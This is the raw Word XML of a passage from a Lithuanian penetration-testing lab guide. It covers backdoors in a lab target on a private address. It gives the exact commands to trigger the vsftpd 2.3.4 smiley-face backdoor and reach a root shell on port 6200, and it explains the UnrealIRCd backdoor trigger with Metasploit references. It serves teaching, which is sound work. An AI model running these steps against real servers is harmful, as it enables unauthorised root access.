              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6321F83B" w14:textId="0D7EE9A0" w:rsidR="00734D95" w:rsidRPr="00734D95" w:rsidRDefault="00734D95" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00734D95">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>umount /tmp/r00t</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6497" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="293CE4FF" w14:textId="71121854" w:rsidR="00734D95" w:rsidRDefault="00734D95" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E3C3F95" wp14:editId="486014B7">
                  <wp:extent cx="2857500" cy="87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7500" cy="876300"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5A754DF8" w14:textId="77777777" w:rsidR="006637C1" w:rsidRPr="00607DC0" w:rsidRDefault="006637C1" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CD5D51B" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ssh root@IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD6EE05" w14:textId="6A9664F8" w:rsidR="00B958F8" w:rsidRPr="00607DC0" w:rsidRDefault="00B958F8"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49194678"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7C75E4CB"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51D73BAD"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5872F575" w14:textId="77777777" w:rsidTr="003C0B7F">
        <w:trPr>
          <w:trHeight w:val="327"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2953" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="69B155A3" w14:textId="43D328C8" w:rsidR="00B958F8" w:rsidRPr="00607DC0" w:rsidRDefault="00A42245" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A42245">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>ssh root@</w:t>
            </w:r>
            <w:r w:rsidRPr="0069502D">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>192.168.177.128</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6497" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="532F4B92" w14:textId="1D1DB3A5" w:rsidR="00B958F8" w:rsidRPr="00607DC0" w:rsidRDefault="00A42245" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17818DE5" wp14:editId="602D5292">
                  <wp:extent cx="4119245" cy="1903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9245" cy="1903730"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5E777815" w14:textId="77777777" w:rsidR="00B958F8" w:rsidRPr="00607DC0" w:rsidRDefault="00B958F8" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FE22E69" w14:textId="77777777" w:rsidR="00B958F8" w:rsidRPr="00607DC0" w:rsidRDefault="00B958F8" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D021BC7" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc258656091"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Paslaugos: Backdoors (užpakalinės durys)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="2EEED132" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1ADC2FA7" w14:textId="09342A4F" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>21 (port)</w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> prieigą naudoja vsftpd, populiarus FTP serveris. Ypač šioje versijoje Backdoor (žr. </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidRPr="00607DC0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">), kuris buvo įkeltas į kodą nežinomų hakerių. Backdoor buvo greitai nustatytas ir pašalintas, bet ne nemažai žmonių jį atsisiųsti su sistemų atsinaujinimais. Backdoor veikia, kaip užklausoje dėl </w:t>
      </w:r>
      <w:r w:rsidR="00876D9A" w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>naudot</w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ojo prisijungimo yra naudojamas papildomas simbolis ":)" [laimingas veidas] pabaigoje. Backdoor apkrėstoji versija atveria 6200 prieigą (port). Mes galime tai įrodyti su telnet ar naudotis Metasploit (žr. http://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor) pagrindų modulis automatiškai jį išnaudoti.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F28323" w14:textId="01D259C7" w:rsidR="00B958F8" w:rsidRPr="00607DC0" w:rsidRDefault="00B958F8"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3196E38B"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679DE20E"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2EF6152B"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1BA4C1C7" w14:textId="77777777" w:rsidTr="003C0B7F">
        <w:trPr>
          <w:trHeight w:val="327"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2953" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="04A42BEF" w14:textId="38D728F3" w:rsidR="002D31E9" w:rsidRPr="00607DC0" w:rsidRDefault="002D31E9" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D31E9">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>telnet 192.168.</w:t>
            </w:r>
            <w:r w:rsidR="00F0282B">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>177</w:t>
            </w:r>
            <w:r w:rsidRPr="002D31E9">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>.1</w:t>
            </w:r>
            <w:r w:rsidR="00F0282B">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>28</w:t>
            </w:r>
            <w:r w:rsidRPr="002D31E9">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t xml:space="preserve"> 21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6497" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="29361A89" w14:textId="32B76818" w:rsidR="00B958F8" w:rsidRPr="00607DC0" w:rsidRDefault="00303B7F" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41212222" wp14:editId="2F273BC8">
                  <wp:extent cx="2295525" cy="962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5525" cy="962025"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B958F8" w:rsidRPr="00607DC0" w14:paraId="4E58AD63" w14:textId="77777777" w:rsidTr="002D31E9">
        <w:trPr>
          <w:trHeight w:val="327"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2953" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1AAAB820" w14:textId="1C1DD08D" w:rsidR="00B958F8" w:rsidRPr="00607DC0" w:rsidRDefault="002D31E9" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D31E9">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t xml:space="preserve">user </w:t>
            </w:r>
            <w:r w:rsidR="00303B7F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>wow:)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6497" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="22666C62" w14:textId="2E0AA327" w:rsidR="00B958F8" w:rsidRPr="00607DC0" w:rsidRDefault="00303B7F" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6921D73F" wp14:editId="524B820C">
                  <wp:extent cx="2543175" cy="333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175" cy="333375"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D31E9" w:rsidRPr="00607DC0" w14:paraId="20194310" w14:textId="77777777" w:rsidTr="002D31E9">
        <w:trPr>
          <w:trHeight w:val="327"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2953" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2ECF30D4" w14:textId="214373D7" w:rsidR="002D31E9" w:rsidRPr="002D31E9" w:rsidRDefault="002D31E9" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D31E9">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t xml:space="preserve">pass </w:t>
            </w:r>
            <w:r w:rsidR="00303B7F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>neteisingas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6497" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5D910929" w14:textId="63FA26D1" w:rsidR="002D31E9" w:rsidRDefault="00303B7F" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0EB01D6F" wp14:editId="1E9A6832">
                  <wp:extent cx="2714625" cy="19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7368"/>
                          <a:stretch/>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="2714625" cy="190500"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:extLst>
                            <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                              <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                            </a:ext>
                          </a:extLst>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D31E9" w:rsidRPr="00607DC0" w14:paraId="2A070F63" w14:textId="77777777" w:rsidTr="002D31E9">
        <w:trPr>
          <w:trHeight w:val="327"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2953" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7D4617B4" w14:textId="723B4435" w:rsidR="002D31E9" w:rsidRPr="002D31E9" w:rsidRDefault="008639A4" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D31E9">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">telnet </w:t>
            </w:r>
            <w:r w:rsidR="00F0282B" w:rsidRPr="002D31E9">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>192.168.</w:t>
            </w:r>
            <w:r w:rsidR="00F0282B">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>177</w:t>
            </w:r>
            <w:r w:rsidR="00F0282B" w:rsidRPr="002D31E9">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>.1</w:t>
            </w:r>
            <w:r w:rsidR="00F0282B">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>28</w:t>
            </w:r>
            <w:r w:rsidRPr="002D31E9">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>6200</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6497" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="050849E2" w14:textId="60B9D7E7" w:rsidR="002D31E9" w:rsidRDefault="008639A4" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="549CB586" wp14:editId="1AECB225">
                  <wp:extent cx="2581275" cy="86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866775"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D31E9" w:rsidRPr="00607DC0" w14:paraId="2F08BEC4" w14:textId="77777777" w:rsidTr="002D31E9">
        <w:trPr>
          <w:trHeight w:val="327"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2953" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0152391B" w14:textId="5FB45253" w:rsidR="002D31E9" w:rsidRPr="002D31E9" w:rsidRDefault="008639A4" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>id;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6497" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4A65660C" w14:textId="38557258" w:rsidR="002D31E9" w:rsidRDefault="008639A4" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41107276" wp14:editId="2F03E033">
                  <wp:extent cx="1857375" cy="504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7375" cy="504825"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="12058CAD" w14:textId="77777777" w:rsidR="00B958F8" w:rsidRPr="00607DC0" w:rsidRDefault="00B958F8" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="481394D2" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>6667 (port)</w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> prieigą naudoja UnreaIRCD IRC paslauga (daemon). Ši versija yra su backdoor (žr. </w:t>
      </w:r>
      <w:hyperlink r:id="rId20" w:history="1">
        <w:r w:rsidRPr="00607DC0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>http://forums.unrealircd.com/viewtopic.php?t=6562</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">). Pažeidžiamumas buvo nepastebėtas mėnesį laiko – trigeris buvo siunčiant laiškus "AB" į sistemos komandas naudojant bet kurią prieigą serveryje. Metasploit turi modulį (žr. </w:t>
      </w:r>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidRPr="00607DC0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>http://www.rapid7.com/db/modules/exploit/unix/irc/unreal_ircd_3281_backdoor</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> ) išnaudoti šiam pažeidžiamumui.</w:t>
      </w:r>
    </w:p>
